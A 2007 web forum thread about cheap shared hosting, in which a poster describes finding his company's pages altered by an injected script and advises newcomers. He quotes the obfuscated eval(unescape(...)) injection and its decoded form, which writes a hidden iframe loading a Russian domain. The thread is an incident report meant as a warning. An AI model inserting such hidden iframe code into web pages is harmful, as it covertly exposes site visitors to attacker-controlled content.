Hints for those new to having a site...
#1 - You get what you pay for
#2 - For a business site, ask someone who knows what they are doing to at least look at the site for problems (not just "looks")
Here is why I bring these two up.
Where I work, they moved few websites to a different hosting company which is only $1 a month and has pretty much "unlimited resources". (and has a not so strict SPAM policy ) Also they installed some 3rd party canned scripts to try out.
Well I'm still not sure where the issue is, I'm leaving it to those who moved it. I only work on the site that is on our own dedicated server. But in looking at one of the sites moved to this account, which is basically a static page, only calling a few images from our site, the status bar was going nuts loading things from x-vicotry.ru, golum.info, a few other russuain domains, a few IP addresses.
I go to the source code, and find out that on ALL of the domains, they now have added code at the bottom of the page...
<script>eval(unescape("%77%69%6e%64%....'I take this and plug it into the urldecode funtion in php, and find it decodes to the following (I added line breaks for easier reading):
window.status='Done';
document.write('<iframe name=27d625dbcdf src=\'http://x-victory.ru/forum?'+Math.round(Math.random()*69500)+'88\' width=500 height=139 style=\'display: none\'></iframe>')I investigate, and find that that the files themselves are modified, not like when geocities would auto inject code into the pages being called. In fact, the one file was modified last night at 7:05pm. The office is closed then.
Well I get told at this point that they installed some scripts on the server, and maybe that did it.
I do more checking. this host has it set that any PHP script runs as our username, so any php script can modify our own files. Where I have hosting, and where we have our dedicated server, unless specifically set up, PHP files run as user "nobody", therefore cannot modify pages we upload (unless you change permissions on the file after uploaded).
So they go an "remove" the scripts. Well after re-uploading the pages (on about 10 domains), an hour later already again they are remodified....
So I ask, did you delete everything and start over or just the directory where you installed the script. Casue if it can write over our own files, guess what, it can create its own directories too....
So anyhow, either the cheap hosting, or the free scripts are modifying every one of our domains to have hidden iframes and calling other sites. Even if it was the scripts, well the hosting company letting scripts run as our own username is crazy.
So again, you get what you pay for, go for the cheapest hosting and/or fre scripts to things, make sure you fully check them out, and not just from a "well I have used them for years" testimony from someone who would have no idea that this is happening in the first place.
(don't ranting now... LOL)
-Greg
Sonic_Wolf posted this at 15:23 — 29th November 2007.
He has: 43 posts
Joined: May 2005
Personally i steer well clear of these cheapo £1 sites.
You get hit with restrictions, the site isn't even your own and the bandwidth is capped (slow surfing etc).
For newbies starting out it's cool but once you get up and running the big bad world of domain names and hosting companies beckons
Lottoplus posted this at 18:34 — 29th November 2007.
They have: 2 posts
Joined: Nov 2007
To get good hosting doesn't have to cost earth, if a person isn't willing to pay about €3.95 (to host 25 sites) a month for good hosting with a good control panel and all up to date software after investing into a website its really their own look out.
mullinahone.net
quirkesfutniture.com
demonhale posted this at 04:13 — 30th November 2007.
He has: 3,278 posts
Joined: May 2005
That's one of my dillema as a web designer as well as a developer, some clients insist on getting their own hosting which is ok if they heed my suggestions, but most of the time they will skimp on the most essential part which is security. They will get injection attacks, and the same insertions as Greg has, they would then blame me for those which I try to explain in vain. They think I'm sabotaging them especially if the insertion code makes popups. What also ticks me the most is when client computers have trojans and when a certain keyword on their page triggers a trojan warning, they immediately associate it with the site when it actually is because of their infected computers...
I hope they actually start reading these stuff to know what's important in getting a design and development service...
Greg K posted this at 10:40 — 30th November 2007.
He has: 2,145 posts
Joined: Nov 2003
In our companies case, it was determined that it was a 3rd party script that was installed onto one of the sites. They ended up completely deleting all files and re uploading the web pages, so far no pages affected.
Now if it was me, I would have done some elimination to find out which one it was, but as I mentioned someone else had done it. According to him, he only installed scripts from the host's control panel, (how truthful that is, who knows).
I told him though, as long as they are with this cheap host, don't install any 3rd party scripts because they all run as our user name, allowing them to modify any files we have.
-Greg
remembrancebook posted this at 16:32 — 16th December 2007.
They have: 16 posts
Joined: May 2007
trouble is, someone setting up a set for the first (or second time) frequently doesn't know what they may need in the future.
As someone who never does things the easy way I speak from experience. I've just moved a site to a new server after twelve months because it developed in ways I hadn't imagined, and I now need to run programmes on my server that my old server wouldn't allow. You definately get what you pay for.
Book of Remembrance
James posted this at 11:02 — 19th December 2007.
He has: 127 posts
Joined: Dec 2005
Some fine points
Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.